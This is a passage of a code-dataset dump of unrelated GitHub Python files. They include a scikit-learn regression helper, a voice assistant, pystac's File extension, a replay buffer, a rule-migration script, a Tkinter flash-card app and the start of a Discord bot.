kernels already setup,\n # but you have to recreate param grid for hyperparameter opt.\n\n model.set_params(kernel='linear')\n\n n_estimators = 5\n bagging = BaggingRegressor(\n model, max_samples=1.0/n_estimators, n_estimators=n_estimators,\n oob_score=True, random_state=seed)\n\n model = bagging\n\n if eval_phase or tuning == 'rscv':\n params = {\n model_name + '__' +\n k: v for k, v in pgd.Bagging_param_grid.items()}\n \n elif model_name == \"KerasReg\" and not eval_phase:\n\n input_dim = int(X_train.shape[1])\n\n model, params = create_best_keras_reg_architecture(\n model_name, input_dim, model.get_params()['nb_epoch'], \n pgd.Keras_param_grid)\n\n elif model_name in ('baseline_nn_default_Reg', \n 'baseline_nn_smaller_Reg', 'larger_nn_Reg', 'deep_nn_Reg', \n 'deeper_nn_Reg', 'larger_deep_nn_Reg') and not eval_phase:\n \n input_dim = int(X_train.shape[1])\n model, params = create_keras_regressors(\n input_dim, model.get_params()['nb_epoch'], \n model.get_params()['batch_size'], model_name)\n\n elif model_name == \"PolynomialRidgeReg\":\n\n interact_only=False\n if X_train.shape[0] > 100000:\n interact_only=True\n poly_features = PolynomialFeatures(\n degree=5, interaction_only=interact_only)\n try:\n poly_features.fit(X_train)\n except MemoryError as me:\n print(\"MemoryError -- Unable to create polynomial features.\")\n raise(me)\n except Exception as e:\n raise e\n else:\n print(\n \"Successfully created PolynomialFeatures obj.:\", poly_features)\n\n else:\n pass\n\n if not eval_phase:\n # # n_jobs=-2 to avoid burdening your PC\n if hasattr(model, 'n_jobs'):\n print(\"Using all available cores.\")\n model.set_params(n_jobs=-1)\n\n if tuning is None and params is not None:\n print(\"Parameters are useless for testing default/optimized model.\")\n params = None\n\n feats_and_params = (model, cv, tuning, params, poly_features)\n\n return feats_and_params\n\n\ndef save_regressor(\n estimator=None, name='', d_name=None, tuning='NoTuning', serial=0):\n if not serial:\n serial = \"%04d\" % randint(0, 1000)\n\n model_name = name\n\n if d_name is not None:\n name = d_name + \"_\" + name\n\n if tuning is None:\n tuning = 'NoTuning'\n elif tuning == 'rscv':\n pass\n elif tuning not in ('NoTuning', 'rscv'):\n raise ValueError(\n \"%s is not a valid value for variable 'tuning'\"\n \"valid value are ['NoTuning', 'rscv']\" % tuning)\n else:\n raise TypeError(\"'tuning' must be of type 'string'\")\n\n f_name = name + '_' + tuning + '_' + serial\n\n # independent of model name\n # train fcts save pipelines, next v. save plain models\n if is_regressor(estimator):\n # can be a sklearn.pipeline(regressor)/regressor\n au.save_model(estimator, f_name + '.pkl')\n elif isinstance(estimator, Pipeline):\n if isinstance(estimator.named_steps[model_name], KerasRegressor):\n keras_f_name = au.create_keras_model_filename(f_name)\n estimator.named_steps[model_name].model.save(keras_f_name + '.h5')\n\n if(len(estimator.steps)) > 1:\n # estimator.named_steps[model_name].model = None\n # or\n # estimator[model_name].model = None\n estimator.steps.pop()\n f_name = name + '_' + tuning + '_for_keras_model_' + serial\n \n au.save_model(estimator, f_name + '.pkl')\n else:\n raise TypeError(\n \"% is not a sklearn pipeline containing a KerarRegressor\"\n \"neither a KerasRegressor itself\" % model_name)\n # here you could check whether you have plain KerasRegressor...\n else:\n raise TypeError(\n \"% is neither a sklearn pipeline containing a valid Regressor\"\n \"nor a valid sklearn Regressor itself\" % model_names)\n\n del estimator\n\n print()","repo_name":"SimonCarozza/autolrn","sub_path":"autolrn/regression/r_eval_utils.py","file_name":"r_eval_utils.py","file_ext":"py","file_size_in_byte":16945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"16918732951","text":"# Youtube link used for this program: https://youtu.be/AWvsXxDtEkU (creating a virtual assistant by Programming Hero)\n\nimport speech_recognition as sr\nimport pyttsx3\nimport pywhatkit\nimport datetime\nimport wikipedia\nimport pyjokes\n\nlistener = sr.Recognizer ()\nengine = pyttsx3.init ()\nvoices = engine.getProperty('voices')\nengine.setProperty('voice', voices[1].id)\n\ndef talk(text):\n engine.say (text)\n engine.runAndWait ()\n\ndef take_command ():\n try:\n with sr.Microphone () as source: # using microphone as the source for the user's command\n listen = \"Listening...\"\n print (listen)\n talk (listen)\n print ()\n voice = listener.listen(source) # the program will listen to what was the user's saying\n command = listener.recognize_google(voice)\n command = command.lower()\n if 'alexa' in command: # the program will only continue if they hear the word \"alexa\" during the user's command\n command = command.replace ('alexa', '')\n print (command)\n print ()\n except:\n pass\n return command\n\ndef run_alexa ():\n command = take_command ()\n if 'play' in command: # the virtual assistant will play the song in Youtube with the help of pywhatkit\n song = command.replace ('play', '')\n song_play = 'Playing' + song\n print (song_play)\n print()\n talk (song_play)\n pywhatkit.playonyt (song)\n elif 'time' in command: # the virtual assistant will tell the time (format of time will be in hours:minutes and is stated in 12-hour format instead of 24-hour format (e.g. 12:22 PM))\n time = datetime.datetime.now().strftime('%I:%M %p')\n time_today = \"The current time is \" + time\n print (time_today)\n print()\n talk (time_today)\n elif 'date' in command: # the virtual assistant will tell the date today (format of date will be in \"month\" \"day\", \"year\" (e.g. November 19, 2022))\n date = datetime.datetime.now().strftime ('%B %d, %Y')\n date_today = \"The date today is \" + date\n print (date_today)\n print()\n talk (date_today)\n elif 'search for' in command: # the virtual assistant will search for the subject in wikipedia and will give a 2-setence summary\n search = command.replace ('search for', '')\n wiki_info = wikipedia.summary(search, 2)\n print (wiki_info)\n print()\n talk (wiki_info)\n elif 'how are you' in command: # the virtual assistant will reply to the user if they heard the \"how are you\" phrase\n great = \"I'm doing great today.\"\n print (great)\n print()\n talk (great)\n elif 'free today' in command: # the virtual assistant will reply to the user if they heard the \"free today\" phrase\n free = \"Not really. I still have a lot to do today.\"\n print (free)\n print()\n talk (free)\n elif 'joke' in command: # the virtual assistant will tell the user a joke with the help of pyjokes module\n joke = pyjokes.get_joke()\n print (joke)\n print()\n talk (joke)\n else: # if the user didnt say anything or didnt hear any of the keywords above\n say = \"I didn't understand that, please say it again.\"\n print (say)\n print ()\n talk (say)\n\nwhile True: # program will loop after each conversation with the virtual assistant\n run_alexa ()","repo_name":"gelaelala/SEATWORK-3-DATA-STRUCTURE-AND-ALGORITHM-BSCOE-2-6","sub_path":"virtual assistant.py","file_name":"virtual assistant.py","file_ext":"py","file_size_in_byte":3440,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"27371198701","text":"# 0 Type;\n# 1 Avialable count;\n# 2 Capacity;\n# 3 Price for 1km;\n# 4 Maks daily distance;\n# 5 Max delivery points;\n\nimport csv\nimport os\n\nclass FleetTypesImporter:\n def __init__(self, path):\n self.path = os.path.join(os.path.dirname(__file__), path)\n\n def process(self, count):\n self.trucks = {\n 'names': [],\n 'count': [],\n 'maxDeliveryPoints': [],\n 'maxDailyDistances': [],\n 'capacities': [],\n 'rates': [],\n }\n with open(self.path, 'rb') as file:\n reader = csv.reader(file, delimiter = ';')\n file.next()\n for row in reader:\n self.trucks['names'].append(row[0]),\n self.trucks['count'].append(int(row[1]) / count),\n self.trucks['capacities'].append(int(row[2]))\n self.trucks['rates'].append(float(row[3].replace(',', '.')))\n self.trucks['maxDailyDistances'].append(int(row[4]))\n self.trucks['maxDeliveryPoints'].append(int(row[5]))\n return self.trucks\n","repo_name":"czajkovsky/truck-planner","sub_path":"importers/fleet_types_importer.py","file_name":"fleet_types_importer.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"79"} +{"seq_id":"32130075007","text":"\"\"\"Implements the File extension.\n\nhttps://github.com/stac-extensions/file\n\"\"\"\n\nfrom typing import Any, Dict, Iterable, List, Optional, Union\n\nimport pystac\nfrom pystac.extensions.base import ExtensionManagementMixin, PropertiesExtension\nfrom pystac.extensions.hooks import ExtensionHooks\nfrom pystac.serialization.identify import (\n OldExtensionShortIDs,\n STACJSONDescription,\n STACVersionID,\n)\nfrom pystac.utils import StringEnum, get_required, map_opt\n\nSCHEMA_URI = \"https://stac-extensions.github.io/file/v2.0.0/schema.json\"\n\nPREFIX = \"file:\"\nBYTE_ORDER_PROP = PREFIX + \"byte_order\"\nCHECKSUM_PROP = PREFIX + \"checksum\"\nHEADER_SIZE_PROP = PREFIX + \"header_size\"\nSIZE_PROP = PREFIX + \"size\"\nVALUES_PROP = PREFIX + \"values\"\n\n\nclass ByteOrder(StringEnum):\n \"\"\"List of allows values for the ``\"file:byte_order\"`` field defined by the\n :stac-ext:`File Info Extension `.\"\"\"\n\n LITTLE_ENDIAN = \"little-endian\"\n BIG_ENDIAN = \"big-endian\"\n\n\nclass MappingObject:\n \"\"\"Represents a value map used by assets that are used as classification layers, and\n give details about the values in the asset and their meanings.\"\"\"\n\n properties: Dict[str, Any]\n\n def __init__(self, properties: Dict[str, Any]) -> None:\n self.properties = properties\n\n def apply(self, values: List[Any], summary: str) -> None:\n \"\"\"Sets the properties for this :class:`~MappingObject` instance.\n\n Args:\n values : The value(s) in the file. At least one array element is required.\n summary : A short description of the value(s).\n \"\"\"\n self.values = values\n self.summary = summary\n\n @classmethod\n def create(cls, values: List[Any], summary: str) -> \"MappingObject\":\n \"\"\"Creates a new :class:`~MappingObject` instance.\n\n Args:\n values : The value(s) in the file. At least one array element is required.\n summary : A short description of the value(s).\n \"\"\"\n m = cls({})\n m.apply(values=values, summary=summary)\n return m\n\n @property\n def values(self) -> List[Any]:\n \"\"\"Gets or sets the list of value(s) in the file. At least one array element is\n required.\"\"\"\n return get_required(self.properties.get(\"values\"), self, \"values\")\n\n @values.setter\n def values(self, v: List[Any]) -> None:\n self.properties[\"values\"] = v\n\n @property\n def summary(self) -> str:\n \"\"\"Gets or sets the short description of the value(s).\"\"\"\n return get_required(self.properties.get(\"summary\"), self, \"summary\")\n\n @summary.setter\n def summary(self, v: str) -> None:\n self.properties[\"summary\"] = v\n\n @classmethod\n def from_dict(cls, d: Dict[str, Any]) -> \"MappingObject\":\n return cls.create(**d)\n\n def to_dict(self) -> Dict[str, Any]:\n return self.properties\n\n\nclass FileExtension(\n PropertiesExtension, ExtensionManagementMixin[Union[pystac.Item, pystac.Collection]]\n):\n \"\"\"A class that can be used to extend the properties of an :class:`~pystac.Asset`\n with properties from the :stac-ext:`File Info Extension `.\n\n To create an instance of :class:`FileExtension`, use the\n :meth:`FileExtension.ext` method. For example:\n\n .. code-block:: python\n\n >>> asset: pystac.Asset = ...\n >>> file_ext = FileExtension.ext(asset)\n \"\"\"\n\n asset_href: str\n \"\"\"The ``href`` value of the :class:`~pystac.Asset` being extended.\"\"\"\n\n properties: Dict[str, Any]\n \"\"\"The :class:`~pystac.Asset` fields, including extension properties.\"\"\"\n\n additional_read_properties: Optional[Iterable[Dict[str, Any]]] = None\n \"\"\"If present, this will be a list containing 1 dictionary representing the\n properties of the owning :class:`~pystac.Item`.\"\"\"\n\n def __init__(self, asset: pystac.Asset):\n self.asset_href = asset.href\n self.properties = asset.extra_fields\n if asset.owner and isinstance(asset.owner, pystac.Item):\n self.additional_read_properties = [asset.owner.properties]\n\n def __repr__(self) -> str:\n return \"\".format(self.asset_href)\n\n def apply(\n self,\n byte_order: Optional[ByteOrder] = None,\n checksum: Optional[str] = None,\n header_size: Optional[int] = None,\n size: Optional[int] = None,\n values: Optional[List[MappingObject]] = None,\n ) -> None:\n \"\"\"Applies file extension properties to the extended Item.\n\n Args:\n byte_order : Optional byte order of integer values in the file. One of\n ``\"big-endian\"`` or ``\"little-endian\"``.\n checksum : Optional multihash for the corresponding file,\n encoded as hexadecimal (base 16) string with lowercase letters.\n header_size : Optional header size of the file, in bytes.\n size : Optional size of the file, in bytes.\n values : Optional list of :class:`~MappingObject` instances that lists the\n values that are in the file and describe their meaning. See the\n :stac-ext:`Mapping Object ` docs for an example.\n If given, at least one array element is required.\n \"\"\"\n self.byte_order = byte_order\n self.checksum = checksum\n self.header_size = header_size\n self.size = size\n self.values = values\n\n @property\n def byte_order(self) -> Optional[ByteOrder]:\n \"\"\"Gets or sets the byte order of integer values in the file. One of big-endian\n or little-endian.\"\"\"\n return self._get_property(BYTE_ORDER_PROP, ByteOrder)\n\n @byte_order.setter\n def byte_order(self, v: Optional[ByteOrder]) -> None:\n self._set_property(BYTE_ORDER_PROP, v)\n\n @property\n def checksum(self) -> Optional[str]:\n \"\"\"Get or sets the multihash for the corresponding file, encoded as hexadecimal\n (base 16) string with lowercase letters.\"\"\"\n return self._get_property(CHECKSUM_PROP, str)\n\n @checksum.setter\n def checksum(self, v: Optional[str]) -> None:\n self._set_property(CHECKSUM_PROP, v)\n\n @property\n def header_size(self) -> Optional[int]:\n \"\"\"Get or sets the header size of the file, in bytes.\"\"\"\n return self._get_property(HEADER_SIZE_PROP, int)\n\n @header_size.setter\n def header_size(self, v: Optional[int]) -> None:\n self._set_property(HEADER_SIZE_PROP, v)\n\n @property\n def size(self) -> Optional[int]:\n \"\"\"Get or sets the size of the file, in bytes.\"\"\"\n return self._get_property(SIZE_PROP, int)\n\n @size.setter\n def size(self, v: Optional[int]) -> None:\n self._set_property(SIZE_PROP, v)\n\n @property\n def values(self) -> Optional[List[MappingObject]]:\n \"\"\"Get or sets the list of :class:`~MappingObject` instances that lists the\n values that are in the file and describe their meaning. See the\n :stac-ext:`Mapping Object ` docs for an example. If given,\n at least one array element is required.\"\"\"\n return map_opt(\n lambda values: [\n MappingObject.from_dict(mapping_obj) for mapping_obj in values\n ],\n self._get_property(VALUES_PROP, List[Dict[str, Any]]),\n )\n\n @values.setter\n def values(self, v: Optional[List[MappingObject]]) -> None:\n self._set_property(\n VALUES_PROP,\n map_opt(\n lambda values: [mapping_obj.to_dict() for mapping_obj in values], v\n ),\n )\n\n @classmethod\n def get_schema_uri(cls) -> str:\n return SCHEMA_URI\n\n @classmethod\n def ext(cls, obj: pystac.Asset, add_if_missing: bool = False) -> \"FileExtension\":\n \"\"\"Extends the given STAC Object with properties from the :stac-ext:`File Info\n Extension `.\n\n This extension can be applied to instances of :class:`~pystac.Asset`.\n \"\"\"\n if isinstance(obj, pystac.Asset):\n cls.validate_owner_has_extension(obj, add_if_missing)\n return cls(obj)\n else:\n raise pystac.ExtensionTypeError(\n f\"File Info extension does not apply to type '{type(obj).__name__}'\"\n )\n\n\nclass FileExtensionHooks(ExtensionHooks):\n schema_uri: str = SCHEMA_URI\n prev_extension_ids = {\"file\"}\n stac_object_types = {pystac.STACObjectType.ITEM}\n\n def migrate(\n self, obj: Dict[str, Any], version: STACVersionID, info: STACJSONDescription\n ) -> None:\n # The checksum field was previously it's own extension.\n old_checksum: Optional[Dict[str, str]] = None\n if info.version_range.latest_valid_version() < \"v1.0.0-rc.2\":\n if OldExtensionShortIDs.CHECKSUM.value in info.extensions:\n old_item_checksum = obj[\"properties\"].get(\"checksum:multihash\")\n if old_item_checksum is not None:\n if old_checksum is None:\n old_checksum = {}\n old_checksum[\"__item__\"] = old_item_checksum\n for asset_key, asset in obj[\"assets\"].items():\n old_asset_checksum = asset.get(\"checksum:multihash\")\n if old_asset_checksum is not None:\n if old_checksum is None:\n old_checksum = {}\n old_checksum[asset_key] = old_asset_checksum\n\n try:\n obj[\"stac_extensions\"].remove(OldExtensionShortIDs.CHECKSUM.value)\n except ValueError:\n pass\n\n super().migrate(obj, version, info)\n\n if old_checksum is not None:\n if SCHEMA_URI not in obj[\"stac_extensions\"]:\n obj[\"stac_extensions\"].append(SCHEMA_URI)\n for key in old_checksum:\n if key == \"__item__\":\n obj[\"properties\"][CHECKSUM_PROP] = old_checksum[key]\n else:\n obj[\"assets\"][key][CHECKSUM_PROP] = old_checksum[key]\n\n\nFILE_EXTENSION_HOOKS: ExtensionHooks = FileExtensionHooks()\n","repo_name":"stac-utils/qgis-stac-plugin","sub_path":"src/qgis_stac/lib/pystac/extensions/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":10106,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"79"} +{"seq_id":"25991328141","text":"\"\"\"Simple replay buffer\nRef: https://github.com/openai/baselines/blob/master/baselines/deepq/replay_buffer.py\n\"\"\"\nimport numpy as np\n\n\nclass ReplayBuffer(object):\n def __init__(self):\n self.storage = []\n\n def __len__(self):\n return len(self.storage)\n\n def clear(self):\n self.storage.clear()\n assert len(self.storage) == 0\n\n def sync(self, memory):\n self.clear()\n for exp in memory.storage:\n self.storage.append(exp)\n\n assert len(memory) == len(self.storage)\n\n def add(self, data):\n # Expects tuples of (state, next_state, action, reward, done)\n if len(self.storage) > 1.5e5:\n self.storage.pop(0)\n self.storage.append(data)\n\n def sample(self, batch_size):\n ind = np.random.randint(0, len(self.storage), size=batch_size)\n x_gridmap, x_theta = [], []\n y_gridmap, y_theta = [], []\n u, r, d = [], [], []\n\n for i in ind: \n X, Y, U, R, D = self.storage[i]\n\n x_gridmap.append(np.array(X[\"gridmap\"], copy=False))\n x_theta.append(np.array(X[\"theta\"], copy=False))\n\n y_gridmap.append(np.array(Y[\"gridmap\"], copy=False))\n y_theta.append(np.array(Y[\"theta\"], copy=False))\n\n u.append(np.array(U, copy=False))\n r.append(np.array(R, copy=False))\n d.append(np.array(D, copy=False))\n\n x_gridmap = np.array(x_gridmap)\n x_theta = np.array(x_theta)\n\n y_gridmap = np.array(y_gridmap)\n y_theta = np.array(y_theta)\n\n x = {\"gridmap\": x_gridmap, \"theta\": x_theta}\n y = {\"gridmap\": y_gridmap, \"theta\": y_theta}\n\n return \\\n x, y, np.asarray(u, dtype=np.int64).reshape(-1, 1), \\\n np.array(r).reshape(-1, 1), np.array(d).reshape(-1, 1)\n","repo_name":"mit-acl/dc2g","sub_path":"rl_baseline/misc/replay_buffer.py","file_name":"replay_buffer.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"79"} +{"seq_id":"44619432723","text":"from json import loads, dumps\n\n\ndef test_app():\n s = \"\"\"\n {\n \"base_version\": 1,\n \"uuid\": \"c31de18d-b56e-41b9-b43b-a1c6d69ec6a0\",\n \"info\": {\n \"app_name\": \"1Password\",\n \"config_version\": 1,\n \"url\": \"https://play.google.com/store/apps/details?id=com.agilebits.onepassword\"\n },\n \"app_config\": {\n \"hub_info\": {\n \"hub_uuid\": \"65c2f60c-7d08-48b8-b4ba-ac6ee924f6fa\"\n },\n \"target_checker\": {\n \"api\": \"App_Package\",\n \"extra_string\": \"com.agilebits.onepassword\"\n }\n }\n}\n \"\"\"\n print(migration_1_2_app(s))\n\n\ndef test_hub():\n s = \"\"\"\n {\n \"base_version\": 5,\n \"uuid\": \"6a6d590b-1809-41bf-8ce3-7e3f6c8da945\",\n \"info\": {\n \"hub_name\": \"F-droid\",\n \"config_version\": 2\n },\n \"api_keywords\": [\"android_app_package\"],\n \"app_url_templates\": [\n \"https://f-droid.org/%language/packages/%android_app_package/\",\n \"https://f-droid.org/packages/%android_app_package/\"\n ]\n}\n \"\"\"\n print(migration_5_6_hub(s))\n\n\ndef migration_1_2_app(s: str) -> str or None:\n old_json = loads(s)\n if old_json[\"base_version\"] != 1:\n raise KeyError\n target = old_json[\"app_config\"][\"target_checker\"]\n extra_map = {__api_constant(target[\"api\"]): target[\"extra_string\"]}\n new_json = {\n \"base_version\": 2,\n \"config_version\": old_json[\"info\"][\"config_version\"],\n \"uuid\": old_json[\"uuid\"],\n \"base_hub_uuid\": old_json[\"app_config\"][\"hub_info\"][\"hub_uuid\"],\n \"info\": {\n \"name\": old_json[\"info\"][\"app_name\"],\n \"url\": old_json[\"info\"][\"url\"],\n \"extra_map\": extra_map,\n },\n }\n return dumps(new_json, indent=2, ensure_ascii=False)\n\n\ndef __api_constant(_s: str) -> str or None:\n s = _s.lower()\n if s == \"app_package\":\n return \"android_app_package\"\n elif s == \"magisk_module\":\n return \"android_magisk_module\"\n elif s == \"shell\":\n return \"android_custom_shell\"\n elif s == \"shell_root\":\n return \"android_custom_shell_root\"\n else:\n return\n\n\ndef migration_5_6_hub(s: str) -> str or None:\n old_json = loads(s)\n if old_json[\"base_version\"] != 5:\n raise KeyError\n new_json = {\n \"base_version\": 6,\n \"config_version\": old_json[\"info\"][\"config_version\"],\n \"uuid\": old_json[\"uuid\"],\n \"info\": {\n \"hub_name\": old_json[\"info\"][\"hub_name\"],\n \"hub_icon_url\": \"\"\n },\n \"target_check_api\": \"\",\n \"api_keywords\": old_json[\"api_keywords\"],\n \"app_url_templates\": old_json[\"app_url_templates\"],\n }\n return dumps(new_json, indent=2, ensure_ascii=False)\n","repo_name":"DUpdateSystem/UpgradeAll-rules","sub_path":"scripts/migration/migration_1_2.py","file_name":"migration_1_2.py","file_ext":"py","file_size_in_byte":2603,"program_lang":"python","lang":"en","doc_type":"code","stars":56,"dataset":"github-code","pt":"7"} +{"seq_id":"43191510637","text":"class Solution:\n def findDifference(self, nums1: List[int], nums2: List[int]) -> List[List[int]]:\n nums1_set = set(nums1)\n nums2_set = set(nums2)\n\n ret1, ret2 = set(), set()\n for i in range(len(nums1)):\n if nums1[i] not in nums2_set:\n ret1.add(nums1[i])\n\n for i in range(len(nums2)):\n if nums2[i] not in nums1_set:\n ret2.add(nums2[i])\n\n return [list(ret1), list(ret2)]\n\n ","repo_name":"qtsky89/leetcode","sub_path":"find-the-difference-of-two-arrays/find-the-difference-of-two-arrays.py","file_name":"find-the-difference-of-two-arrays.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21487121955","text":"\"\"\"add target template\n\nRevision ID: 9eb38607305e\nRevises: c4ba5403c197\nCreate Date: 2023-07-08 23:26:39.924649\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n\n# revision identifiers, used by Alembic.\nrevision = '9eb38607305e'\ndown_revision = 'c4ba5403c197'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_table('target_cnt_template',\n sa.Column('template_id', sa.Integer(), autoincrement=True, nullable=False),\n sa.Column('name', sa.String(length=32), nullable=True),\n sa.Column('description', sa.String(length=128), nullable=True),\n sa.Column('value', sa.Numeric(precision=8), nullable=True),\n sa.Column('currency', sqlalchemy_utils.types.currency.CurrencyType(length=3), nullable=True),\n sa.PrimaryKeyConstraint('template_id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('target_cnt_template')\n # ### end Alembic commands ###\n","repo_name":"beilak/HomeRP_Finance","sub_path":"alembic/versions/9eb38607305e_add_target_template.py","file_name":"9eb38607305e_add_target_template.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"11507442630","text":"#!/usr/bin/python\n\nimport sys, os\nimport scipy.io as sio\nimport numpy as np\n\nfrom randomWalk_db import *\nfrom models import *\n\nprint(len(sys.argv))\n\nassert len(sys.argv)==2, 'wrong cmd line options'\n\nprint(sys.argv)\ninput_file = sys.argv[1]\n\nprint('Reading from ', input_file, ' ...')\n\nmat = sio.loadmat(input_file, squeeze_me=True, struct_as_record=False)\noutput = mat['output']\n\ntime = output.t\ny = output.y\n\nmatlab_to_sql = dict(domainlength='DomainSize',\n IC_p = 'ic_p',\n IC_type = 'ic_type',\n R = 'R',\n gridcells = 'DomainN',\n DiffCoeff = 'diffusion_coeff',\n alpha = 'drift_coeff',\n g_type = 'g_type',\n u_0 = 'u0',\n omega_type = 'omega_type',\n omega_p = 'omega_p',\n BCs = 'bcs')\n\n# parameters from simulations\np = output.params\n\nparameters = p.__dict__['_fieldnames']\n\ntemp_data = dict()\nfor parameter in parameters:\n temp_data[matlab_to_sql[parameter]] = getattr(p, parameter)\n\n# BCs is not available in the actual parameters\ntemp_data['bcs']='pp'\ntemp_data['ic_weigth']=0.09\n\nprint(temp_data)\n\n# open database connection\ndb = RandomWalkDB()\n\n# get parameter object\np2 = db.param_create_if_not_exist(temp_data)\n\nprint('parameters=', p2)\n# get the rw object\nsim_id = db.createSimulation('MATLAB-0.1', p2.id)\n\n# write path data to the database\n# write it for each\nfor path, t in zip(y, time):\n #print('y[', np.around(t+1E-3, decimals=2), ']=', path, ' sim_id=', sim_id)\n db.storePath(path, np.around(t+1E-3, decimals=2), sim_id, '0.1', 0, stochastic=False)\n\n","repo_name":"adrs0049/AdhesionRandomWalk","sub_path":"python/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"73774991584","text":"from tkinter import *\nimport pandas\nimport random\n\nBACKGROUND_COLOR = \"#B1DDC6\"\nto_learn = {}\ncurrent_card = {}\n\ntry:\n data = pandas.read_csv(\"./data/words_to_lear.csv\")\nexcept FileNotFoundError:\n original_data = pandas.read_csv(\"./data/french_words.csv\")\n to_learn = original_data.to_dict(orient=\"records\")\nelse:\n to_learn = data.to_dict(orient=\"records\")\n\ndef next_card():\n global current_card, flip_timer\n\n window.after_cancel(flip_timer)\n\n current_card = random.choice(to_learn)\n canvas.itemconfig(card_image, image=card_front)\n canvas.itemconfig(card_front_label, text=\"French\", fill=\"#000\")\n canvas.itemconfig(card_front_word, text=current_card[\"French\"], fill=\"#000\")\n\n flip_timer = window.after(3000, flip_card)\n\n\ndef flip_card():\n canvas.itemconfig(card_image, image=card_back)\n canvas.itemconfig(card_front_label, text=\"English\", fill=\"#fff\")\n canvas.itemconfig(card_front_word, text=current_card[\"English\"], fill=\"#fff\")\n\n\ndef right_answer():\n to_learn.remove(current_card)\n new_data = pandas.DataFrame(to_learn)\n new_data.to_csv(\"./data/words_to_lear.csv\", index=False)\n\n next_card()\n\n\nwindow = Tk()\nwindow.title(\"Password Manager\")\nwindow.config(padx=50, pady=50, background=BACKGROUND_COLOR)\n\nflip_timer = window.after(3000, flip_card)\n\n# Card\ncanvas = Canvas(width=800, height=526, background=BACKGROUND_COLOR, highlightthickness=0)\ncard_front = PhotoImage(file=\"./images/card_front.png\")\ncard_back = PhotoImage(file=\"./images/card_back.png\")\ncard_image = canvas.create_image(400, 263, image=card_front)\n\ncard_front_label = canvas.create_text(400, 150, text=\"Title\", font=(\"Arial\", 40, \"italic\"), fill=\"#000\")\ncard_front_word = canvas.create_text(400, 253, text=\"word\", font=(\"Arial\", 60, \"bold\"), fill=\"#000\")\n\ncanvas.grid(column=0, row=0, columnspan=2)\n\n# Right\nright_img = PhotoImage(file=\"./images/right.png\")\nbutton_right = Button(image=right_img, highlightbackground=BACKGROUND_COLOR, command=right_answer)\nbutton_right.grid(column=1, row=1)\n\n# Wrong\nwrong_img = PhotoImage(file=\"./images/wrong.png\")\nbutton_wrong = Button(image=wrong_img, highlightbackground=BACKGROUND_COLOR, command=next_card)\nbutton_wrong.grid(column=0, row=1)\n\nnext_card()\n\nwindow.mainloop()\n","repo_name":"mkubincova/100days-of-python","sub_path":"31-flash-cards-capstone/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"29759730156","text":"#!/usr/bin/python\n__author__ = 'Pavel Gladkov'\n\nimport sys\n\nres = {}\n\nfor line in sys.stdin:\n line = line.strip()\n\n key, val = line.split('\\t')\n try:\n val = float(val)\n except ValueError:\n continue\n\n try:\n res[key] += val\n except KeyError:\n res[key] = val\n\nfor key in res.keys():\n print('%s\\t%s' % (key, res[key]))","repo_name":"pvgladkov/BigData","sub_path":"streaming_partitioner/reducer.py","file_name":"reducer.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"2878791496","text":"import asyncio\nimport discord\nimport os\nfrom datetime import datetime, timedelta\nfrom discord.ext import commands\nfrom dotenv import load_dotenv\n\n\n# Pterodactyl requirement\nprint('started')\n\n# general variables\nload_dotenv()\nbot_location = f'{os.path.dirname(os.path.abspath(__file__))}/'\n\n\n# bot setup\nclass Shin(commands.AutoShardedBot):\n # load cogs\n async def setup_hook(self):\n print(f'{current_time()} - Loading cogs')\n for file in os.listdir(f'{bot_location}cogs'):\n if file.endswith('.py'):\n try:\n await bot.load_extension(f'cogs.{file[:-3]}')\n except Exception as e:\n print(f'{current_time()} - Error loading: {file[:-3]} || {e}')\n\n print(f'{current_time()} - Syncing command tree')\n await self.tree.sync()\n\n\nintents = discord.Intents.default()\nintents.message_content = True\nintents.members = True\nbot = Shin(\n command_prefix=os.getenv('prefix'),\n case_insensitive=True,\n help_command=None,\n intents=intents\n)\n\n\n# # functions\n# returns current time\ndef current_time():\n return datetime.now().strftime('%d/%m/%Y %H:%M:%S')\n\n\n# set bot status\nasync def set_status():\n await bot.change_presence(activity=discord.Activity(\n type=discord.ActivityType.watching,\n name='anime!'\n )\n )\n\n\n# # bot events\n# on_ready event\n@bot.event\nasync def on_ready():\n print(f'{current_time()} - {bot.user.name} connected to a shard')\n\n\n# on_member_join event\n@bot.event\nasync def on_member_join(member):\n embeds = bot.get_cog('Embeds')\n await member.add_roles(\n member.guild.get_role(669889906071437332),\n member.guild.get_role(669890055472414736),\n member.guild.get_role(685607372428804104),\n reason='Joined server'\n )\n regels_channel = 669161755972206629\n roles_channel = 997578258038132816\n await bot.get_channel(722771390092279819).send(embed=await embeds.join_log(member))\n await bot.get_channel(696859692684541983).send(\n f'Welkom {member.mention}! Lees alvast de <#{regels_channel}> en selecteer je <#{roles_channel}>, '\n f'een <@&669371769672564776> komt je zo snel mogelijk helpen! <:KellyHappyMood:720436790913269802>'\n )\n\n\n# on_member_remove event\n@bot.event\nasync def on_member_remove(member):\n embeds = 